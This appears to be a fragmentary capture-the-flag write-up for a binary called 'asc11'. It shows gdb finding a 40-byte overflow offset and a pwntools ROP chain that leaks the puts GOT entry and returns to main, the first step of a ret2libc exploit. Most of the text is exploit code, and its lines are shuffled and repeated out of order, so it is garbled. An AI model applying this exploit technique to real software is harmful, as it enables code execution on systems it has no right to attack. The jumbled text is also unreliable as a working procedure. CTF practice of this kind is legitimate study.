Asc 11 ✓

payload = b'A'*offset + rop.chain() p.sendlineafter(b'Input: ', payload)

p = process('./asc11') offset = 40 ROP to leak puts@got rop = ROP(elf) rop.puts(elf.got['puts']) rop.call(elf.symbols['main']) asc 11

./asc11 It prints "Input: " , waits for input, then exits. Open in Ghidra/IDA. The main function: payload = b'A'*offset + rop

gdb ./asc11 r < <(python3 -c "print('A'*50)") Crash at RIP = 0x4141414141414141 → offset 40. Check if there’s a win or shell function: waits for input